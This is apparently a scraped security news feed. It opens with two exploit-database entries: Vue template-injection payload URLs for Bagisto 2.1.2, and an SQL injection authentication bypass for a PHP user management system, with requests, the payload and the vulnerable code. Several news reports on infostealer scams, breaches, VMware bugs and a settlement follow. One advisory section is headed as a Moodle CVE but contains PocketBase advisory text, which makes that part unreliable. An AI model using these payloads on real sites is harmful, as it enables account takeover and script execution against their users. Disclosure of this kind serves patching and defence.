Bagisto version 2.1.2 suffers from a client-side template injection vulnerability.

    # Exploit Title: Bagisto 2.1.2 Client-Side Template Injection(CSTI) (VueJS)# Date: 06/18/2024# Exploit Author: tmrswrr# Vendor Homepage: https://forums.bagisto.com/# Version: 2.1.2# Tested on: https://demo.bagisto.com/https://demo.bagisto.com/bagisto-common/search?query={{7*7}}49https://demo.bagisto.com/bagisto-common/search?query={{'a'.toUpperCase()}}Ahttps://demo.bagisto.com/bagisto/search?query={{ Object.keys(this) }}[ "_", "onSubmit", "onInvalidSubmit", "lazyImages", "animateBoxes" ]> Payloads for VueJS 3https://demo.bagisto.com/bagisto/search?query={{_openBlock.constructor('alert(1)')()}}https://demo.bagisto.com/bagisto/search?query={{-function(){this.alert(1)}()}}> You will be see alert button

Bagisto 2.1.2 Client-Side Template Injection

User Registration and Management System version 3.2 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@.:. Exploit Title > User Registration & Management System - SQLi.:. Google Dorks .:.inurl:loginsystem/index.php.:. Date: June 18, 2024.:. Exploit Author: bRpsd.:. Contact: cy[at]live.no.:. Vendor -> https://phpgurukul.com/.:. Product -> https://phpgurukul.com/?sdm_process_download=1&download_id=7003.:. Product Version -> Version 3.2.:. DBMS -> MySQL.:. Tested on > macOS [*nix Darwin Kernel], on local xampp@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@#############|DESCRIPTION|#############"User Management System is a web based technology which manages user database and provides rights to update the their details In this web application user must be registered. This web application provides a way to effectively control record & track the user details who himself/herself registered with us."===========================================================================================Vulnerability 1: Unauthenticated SQL Injection & Authentication bypassTypes: error-basedFile: localhost/admin/index.phpVul Parameter: USERNAME [POST]POST PoC #1: http://tom:8080/loginsystem/admin/index.phpHost: tomUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:127.0) Gecko/20100101 Firefox/127.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 38Origin: http://tomConnection: keep-aliveReferer: http://tom/loginsystem/admin/index.phpCookie: PHPSESSID=fca5cef217b48f9ec0221b75695e4f2aUpgrade-Insecure-Requests: 1username='&password=test&login=Response: Warning: mysqli_fetch_array() expects parameter 1 to be mysqli_result, bool given in /Applications/XAMPP/xamppfiles/htdocs/loginsystem/admin/index.php on line 9===========================================================================================Test #2 => Payload to skip authenticationhttp://localhost:9000/loginsystem/admin/index.phpusername=A' OR 1=1#&password=1&login=Response:302 redirect to dashboard.php===========================================================================================Vuln File:/loginsystem/admin/index.phpVul Code:<?php session_start();include_once('../includes/config.php');// Code for loginif(isset($_POST['login'])){$adminusername=$_POST['username'];$pass=md5($_POST['password']);$ret=mysqli_query($con,"SELECT * FROM admin WHERE username='$adminusername' and password='$pass'");$num=mysqli_fetch_array($ret);if($num>0)

User Registration And Management System 3.2 SQL Injection

A threat actor who goes by alias markopolo has been identified as behind a large-scale cross-platform scam that targets digital currency users on social media with information stealer malware and carries out cryptocurrency theft.
The attack chains involve the use of a purported virtual meeting software named Vortax (and 23 other apps) that are used as a conduit to deliver Rhadamanthys, StealC,

Cybercrime / Cryptocurrency

A threat actor who goes by alias **markopolo** has been identified as behind a large-scale cross-platform scam that targets digital currency users on social media with information stealer malware and carries out cryptocurrency theft.

The attack chains involve the use of a purported virtual meeting software named Vortax (and 23 other apps) that are used as a conduit to deliver Rhadamanthys, StealC, and Atomic macOS Stealer (AMOS), Recorded Future's Insikt Group said in an analysis published this week.

"This campaign, primarily targeting cryptocurrency users, marks a significant rise in macOS security threats and reveals an expansive network of malicious applications," the cybersecurity company noted, describing markopolo as "agile, adaptable, and versatile."

There is evidence connecting the Vortax campaign to prior activity that leveraged trap phishing techniques to target macOS and Windows users via Web3 gaming lures.

A crucial aspect of the malicious operation is its attempt to legitimize Vortax on social media and the internet, with the actors maintaining a dedicated Medium blog filled with suspected AI-generated articles as well as a verified account on X (formerly Twitter) carrying a gold checkmark.

Downloading the booby-trapped application requires victims to provide a RoomID, a unique identifier to a meeting invitation that's propagated via replies to the Vortax account, direct messages, and cryptocurrency-related Discord and Telegram channels.

Once a user enters the necessary Room ID on the Vortax website, they are redirected to a Dropbox link or an external website that stages an installer for the software, which ultimately leads to the deployment of the stealer malware.

"The threat actor that operates this campaign, identified as markopolo, leverages shared hosting and C2 infrastructure for all of the builds," Recorded Future said.

"This suggests that the threat actor relies on convenience to enable an agile campaign, quickly abandoning scams once they are detected or producing diminishing returns, and pivoting to new lures."

The findings show that the pervasive threat of infostealer malware cannot be overlooked, especially in light of the recent campaign targeting Snowflake.

The development comes as Enea revealed SMS scammers' abuse of cloud storage services like Amazon S3, Google Cloud Storage, Backblaze B2, and IBM Cloud Object Storage to trick users into clicking on bogus links that direct to phishing landing pages that siphon customer data.

"Cybercriminals have now found a way to exploit the facility provided by cloud storage to host static websites (typically .HTML files) containing embedded spam URLs in their source code," security researcher Manoj Kumar said.

"The URL linking to the cloud storage is distributed via text messages, which appear to be authentic and can therefore bypass firewall restrictions. When mobile users click on these links, which contain well-known cloud platform domains, they are directed to the static website stored in the storage bucket."

In the final stage, the website automatically redirects users to the embedded spam URLs or dynamically generated URLs using JavaScript and deceives them into parting with personal and financial information.

"Since the main domain of the URL contains, for example, the genuine Google Cloud Storage URL/domain, it is challenging to catch it through normal URL scanning," Kumar said. "Detecting and blocking URLs of this nature presents an ongoing challenge due to their association with legitimate domains belonging to reputable or prominent companies."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Warning: Markopolo's Scam Targeting Crypto Users via Fake Meeting Software

Cops decimate cybercrime infrastructure used to steal data from nearly 2,000 people in Singapore last year.

Source: dpa picture alliance via Alamy

Singapore police scored a win with the arrests of two men accused of operating servers that enabled cybercrimes against Singaporeans and the dismantling of their supporting infrastructure.

In 2023, nearly 2,000 victims in Singapore downloaded malicious Android applications that allowed the scammers to steal device data, including bank information, according to a statement from the Singapore police.

Following a deep analysis of the malware by cybersecurity officials in Singapore, Hong Kong, and Malaysia, where the arrests were made, police were able to track the entire organization behind the attacks, including a syndicate accused of operating a fraudulent customer service center in Taiwan.

"In addition, the HKPF (Hong Kong Police Force) successfully took down 52 malware-controlling servers in Hong Kong and arrested 14 money mules who had allegedly facilitated the malware-enabled scam cases by relinquishing the use of their bank accounts to the scammers for monetary reward," the Singapore police added.

The two arrests included a 26-year-old man who faces up to seven years in prison. The other, a 47-year-old man, will stand trial for the same crimes, plus an additional charge carrying up to 10 years in prison, police said.

**About the Author(s)**

Singapore Extradites Suspected Cybercrime Scammers from Malaysia

The consortium of private companies and academia will focus on ways to protect hardware memory from attacks.

Source: Science Photo Library via Alamy Stock Photo

A new chip security consortium named CHERI Alliance is focused on protecting data stored in hardware memory from cyberattackers.

The alliance backs a protection model that isolates the hardware and software to prevent hackers from injecting code into memory that would allow them to take over systems or steal data.

"Memory issues represent approximately 70% of the routes taken by cyber attackers," said CHERI Alliance in a statement.

CHERI is an acronym for Capability Hardware Enhanced RISC Instructions. The alliance will formally launch in September.

Memory issues are usually addressed through software techniques or coarse-grained hardware memory protection, says alliance spokesperson Tora Fridholm.

"These methods either leave holes or are not very practical," Fridholm says. "What is unique about CHERI is that the technology adds fine-grained memory protection, with the ability to prevent these issues completely without adding a major overhead."

The alliance focuses on securing memory in ARM, MIPS, and RISC-V architectures, which dominate edge devices.

The backing entities include University of Cambridge, the FreeBSD Foundation, Capabilities Limited, lowRISC, and SCI Semiconductor. While ARM dominates the microcontroller and mobile markets, the company is currently not part of the consortium.

ARM has been victim to many memory-bound vulnerabilities, including one earlier this month that allows hackers to access GPU memory. ARM-based processors also had vulnerabilities related to Meltdown and variants of Spectre, which allowed hackers to take over memory.

**Research on Memory Protection**

The CHERI program originally started off in 2010 as a research program between the University of Cambridge and SRI International; and was funded by DARPA's CRASH.

As part of the program, researchers developed CHERI-based hardware with memory protection features. ARM's prototype Morello board with CHERI extensions was reviewed by the Microsoft Security Response Center, which provided recommendations to improve the design. CHERI was described in a research paper published earlier this year as a "hardware-software capability-based system that extends the ISA, toolchain, programming languages, operating systems, and applications in order to provide complete pointer and memory safety."

CHERI researchers also provide toolkits so C and C++ programmers can add memory protection to code. C++ doesn't have automatic memory protection mechanisms, unlike newer development tools, such as Rust, which leaves space for coders to inject malicious code. Coders need to add specific code to protect memory.

**About the Author(s)**

Agam Shah has covered enterprise IT for more than a decade. Outside of machine learning, hardware, and chips, he's also interested in martial arts and Russia.

CHERI Alliance Aims to Secure Hardware Memory

The US passenger rail giant said attackers used previously compromised credentials to crack accounts and access a freight train of personal data.

Source: Peter Titmuss via Alamy Stock Photo

Amtrak has disclosed a data breach affecting train travelers' Guest Rewards accounts.

In a breach-disclosure notice filed with the state of Massachusetts, the national passenger rail service noted that an unknown third party gained unauthorized access to users' account information during the time period of May 15-18.

The transport giant determined that compromised usernames and passwords from prior breaches were likely used to access certain accounts, and stressed in the breach notice that there was no hack of Amtrak systems.

Even so, the information that the threat actor accessed includes a social engineering bonanza of data, including "name, contact information, Amtrak Guest Rewards account number, date of birth, payment details (such as partial credit card number and expiration date), gift card information (such as card number and PIN) and/or information about your transactions and trips."

In some cases, the hackers took over accounts and changed emails and passwords to lock legitimate users out. Amtrak was able to nip that in the bud, though: "We have changed the email address for your Amtrak Guest Rewards account back to your email address and initiated a reset of your account password."

Amtrak didn't elaborate on how many rail aficionados are affected, but urged riders to rotate their passwords and implement multifactor authentication to prevent account access and takeovers.

"Threat actors have realized the high rewards of stealing from travel loyalty programs, which can easily be sold on the Dark Web or converted to tickets that they later sell," said Stuart Wells, Jumio CTO, in an emailed statement shared with media. "It's a reality that's particularly tough on travelers who have worked for months, or even years, to accumulate loyalty points and status through regular trips. Customers who are less frequent travelers may not notice their points disappearing for a long time."

**Multiple Cyber Incidents for Amtrak Customers**

This isn't the first time the data breach engine has left the Amtrak station. In 2020, it disclosed a Guest Rewards breach in which "some personal information may have been viewed," according to the notification, where the threat actor was noticed and booted out of the system "within a few hours."

Jumio's Wells noted that, given the weaknesses known to be present in most mainstream MFA techniques, businesses could go further to protect consumer accounts.

"As cyber threats evolve, businesses must adopt advanced verification technologies to enhance the protection of sensitive user data. Implementing a robust identity verification system is crucial to effectively combat fraud in all forms," he said.

For instance, "utilizing biometric verification methods ensures that illegitimate users and hackers are hindered before causing further harm, as they would need more than just credentials to gain access. This approach protects consumers from having their personal details disclosed from compromised accounts and provides a very effective solution to combat fraud."

**About the Author(s)**

Tara Seals has 20+ years of experience as a journalist, analyst and editor in the cybersecurity, communications and technology space. Prior to Dark Reading, Tara was Editor in Chief at Threatpost, and prior to that, the North American news lead for Infosecurity Magazine. She also spent 13 years working for Informa (formerly Virgo Publishing), as executive editor and editor-in-chief at publications focused on both the service provider and the enterprise arenas. A Texas native, she holds a B.A. from Columbia University, lives in Western Massachusetts with her family and is on a never-ending quest for good Mexican food in the Northeast.

Hackers Derail Amtrak Guest Rewards Accounts in Breach

The cURL wrapper in Moodle retained the original request headers when following redirects, so HTTP authorization header information could be unintentionally sent in requests to redirect URLs.

Skip to content

**Navigation Menu**

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   GitHub Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   *   Enterprise platform
        
        AI-powered developer platform
        
    
*   Pricing

**Provide feedback**

**Saved searches****Use saved searches to filter your results more quickly**

Sign up

1.  GitHub Advisory Database
2.  GitHub Reviewed
3.  CVE-2024-38275

**Moodle HTTP authorization header is preserved between "emulated redirects"**

Moderate severity GitHub Reviewed Published Jun 18, 2024 to the GitHub Advisory Database • Updated Jun 18, 2024

**Package**

composer moodle/moodle (Composer)

**Affected versions**

\>= 4.4.0-beta, < 4.4.1

\>= 4.3.0-beta, < 4.3.5

\>= 4.2.0-beta, < 4.2.8

< 4.1.11

**Patched versions**

4.4.1

4.3.5

4.2.8

4.1.11

**Description**

Published to the GitHub Advisory Database

Jun 18, 2024

Last updated

Jun 18, 2024

GHSA-p2cj-86v4-7782: Moodle HTTP authorization header is preserved between "emulated redirects"

**In order to be exploited you must have both OAuth2 and Password auth methods enabled.**

A possible attack scenario could be:
- a malicious actor register with the targeted user's email (it is unverified)
- at some later point in time the targeted user stumble on your app and decides to sign-up with OAuth2 (_this step could be also initiated by the attacker by sending an invite email to the targeted user_)
- on successful OAuth2 auth we search for an existing PocketBase user matching with the OAuth2 user's email and associate them
- because we haven't changed the password of the existing PocketBase user during the linking, the malicious actor has access to the targeted user account and will be able to login with the initially created email/password

To prevent this for happening we now reset the password for this specific case if the previously created user wasn't verified (an exception to this is if the linking is explicit/manual, aka. when you send `Authorization:TOKEN` with the OAuth2 auth call).

Additionally to warn existing users we now send an email alert in case the user has logged in with password but has at least one OAuth2 account linked. It looks something like:

_Hello,
Just to let you know that someone has logged in to your Acme account using a password while you already have OAuth2 GitLab auth linked.
If you have recently signed in with a password, you may disregard this email.
**If you don't recognize the above action, you should immediately change your Acme account password.**
Thanks,
Acme team_

The flow will be further improved with the [ongoing refactoring](https://github.com/pocketbase/pocketbase/discussions/4355) and we will start sending emails for "unrecognized device" logins (OTP and MFA is already implemented and will be available with the next v0.23.0 release in the near future).



**In order to be exploited you must have both OAuth2 and Password auth methods enabled.**

A possible attack scenario could be:

*   a malicious actor register with the targeted user's email (it is unverified)
*   at some later point in time the targeted user stumble on your app and decides to sign-up with OAuth2 (_this step could be also initiated by the attacker by sending an invite email to the targeted user_)
*   on successful OAuth2 auth we search for an existing PocketBase user matching with the OAuth2 user's email and associate them
*   because we haven't changed the password of the existing PocketBase user during the linking, the malicious actor has access to the targeted user account and will be able to login with the initially created email/password

To prevent this for happening we now reset the password for this specific case if the previously created user wasn't verified (an exception to this is if the linking is explicit/manual, aka. when you send Authorization:TOKEN with the OAuth2 auth call).

Additionally to warn existing users we now send an email alert in case the user has logged in with password but has at least one OAuth2 account linked. It looks something like:

_Hello,  
Just to let you know that someone has logged in to your Acme account using a password while you already have OAuth2 GitLab auth linked.  
If you have recently signed in with a password, you may disregard this email.  
**If you don't recognize the above action, you should immediately change your Acme account password.**  
Thanks,  
Acme team_

The flow will be further improved with the ongoing refactoring and we will start sending emails for "unrecognized device" logins (OTP and MFA is already implemented and will be available with the next v0.23.0 release in the near future).

**References**

*   GHSA-m93w-4fxv-r35v
*   https://nvd.nist.gov/vuln/detail/CVE-2024-38351
*   pocketbase/pocketbase@58ace5d
*   pocketbase/pocketbase#4355

GHSA-m93w-4fxv-r35v: PocketBase performs password auth and OAuth2 unverified email linking

A trio of bugs could allow hackers to escalate privileges and remotely execute code on virtual machines deployed across cloud environments.

Source: Schoening via Alamy Stock Photo

Broadcom has released fixes for three vulnerabilities affecting VMware vCenter, two of which are of critical severity and allow remote code execution (RCE). The disclosures come as virtual machines (VMs) continue to attract the notice of hackers, thanks to the rich repositories of sensitive data and applications they tend to house. Patching immediately is a good idea.

vCenter is the centralized management console for VMware virtual environments, and is used to view and manage VMs, multiple ESXi hosts, and all dependent components from a single centralized location. CVE-2024-37079 and CVE-2024-37080 are heap overflow vulnerabilities in vCenter's implementation of DCERPC — short for Distributed Computing Environment/Remote Procedure Call — used for calling a function on a remote machine as if it were a local one.

DCERPC is useful for engaging with remote machines, especially if you're a remote hacker. Using a specially crafted network packet, an attacker with network access can take advantage of these vulnerabilities to remotely execute their own code on VMs managed by vCenter. The potential for harm has earned both vulnerabilities critical 9.8 out of 10 scores on the CVSS scale.

Broadcom also patched a number of local privilege escalation vulnerabilities resulting from a misconfiguration of sudo within vCenter. Short for "superuser do" or "substitute user do," sudo allows users in Unix systems to run commands with the privileges of another user — at the root level by default. An authenticated local user can take advantage of the bug labeled CVE-2024-37081 to obtain administrative privileges on a vCenter Server appliance. It has been assigned a high CVSS score of 7.8.

As yet, there is no evidence that any of these three vulnerabilities have been exploited in the wild — though that could quickly change. Remediations can be found here, and an accompanying Q&A page here.

**The Risk in Cloud VMs**

According to its own documentation, VMware sports more than 400,000 customers, including 100% of all Fortune 500 and Fortune Global 100 companies. Its technology supports more than 80% of virtualized workloads and a good chunk of business critical applications.

"The increasing popularity of cloud computing has led to a corresponding surge in VM usage, consolidating multiple applications onto a single physical server," explains Patrick Tiquet, vice president of security and architecture at Keeper Security. "This consolidation not only enhances operational efficiency but also presents attackers with the opportunity to compromise a variety of services through a single breach."

vCenter Server epitomizes this risk. As the centralized management software supporting the VMWare vSphere and Cloud Foundation platforms, it provides a launch point for both IT administrators and hackers to reach many VMs running across organizations.

"Successful breaches not only disrupt services and dole out financial losses, but can also lead to the exposure of sensitive data and violations of regulatory requirements, severely damaging an organization’s reputation," Tiquet warns, so patching new vulnerabilities as they crop up is both necessary and insufficient for organizations to be at ease.

Besides network segmentation, vulnerability audits, and other security hardening tactics like incident response planning and maintaining robust backups, he says, it's the job of network administrators to lead from the front: "Administrators should always ensure they’re using a secure vault and secrets management solution, they must apply necessary updates as soon as possible, and they should also check their cloud console’s security controls to ensure they’re following the latest recommendations."

**About the Author(s)**

Nate Nelson is a freelance writer based in New York City. Formerly a reporter at Threatpost, he contributes to a number of cybersecurity blogs and podcasts. He writes "Malicious Life" -- an award-winning Top 20 tech podcast on Apple and Spotify -- and hosts every other episode, featuring interviews with leading voices in security. He also co-hosts "The Industrial Security Podcast," the most popular show in its field.

Critical VMware Bugs Open Swaths of VMs to RCE, Data Theft

Threat actors were able to breach Blackbaud's systems and compromise sensitive data, largely because of the company's poor cybersecurity practices and lack of encrypted data, the AG said.

Source: SOPA Images Limited via Alamy Stock Photo

Blackbaud, a South Carolina-based software company, has been ordered by the California Attorney General's Office to pay $6.75 million to settle a ransomware attack that took place in May 2020.

The attack occurred due to poor security practices, the AG's office said.

After Blackbaud revealed that the threat actors compromised unencrypted Social Security numbers, bank account details, and login credentials, the company "then made misleading statements about the sufficiency of its data security efforts prior to the breach and about the extent of the breach to its nonprofit customers and the public," stated the Attorney General's press release. "These actions violated the Reasonable Data Security Law, Unfair Competition Law, and the False Advertising Law related to data security."

Private information from 13,000 nonprofits, universities, hospitals, and other organizations were compromised through Blackbaud, according to a government-led investigation, leading the company to pay a ransom of 24 bitcoins or $250,000.

The fine is part of a broader set of penalties. Blackbaud initially was fined $3 million in March 2023 before agreeing to a $49.5 million settlement with 49 states and Washington, DC. At the beginning of this year, however, the Federal Trade Commission ordered Blackbaud to also develop an information security program, as well as delete data that is no longer necessary for its services. 

The FTC argued that though the company paid the ransom demanded by the threat actors, it did not take additional steps to ensure that the data was deleted, nor did it step up its security practices, including implementing multifactor authentication, monitoring its network, and encrypting sensitive data, among other things. 

"Not only did Blackbaud fail to protect consumers' personal information, but they misled the public of the full impact of the data breach," stated Attorney General Bonta. "This is simply unacceptable. Today's settlement will ensure that Blackbaud prioritizes safeguarding consumers' personal information and enhances security measures to prevent future incidents."

**About the Author(s)**

Tag

#auth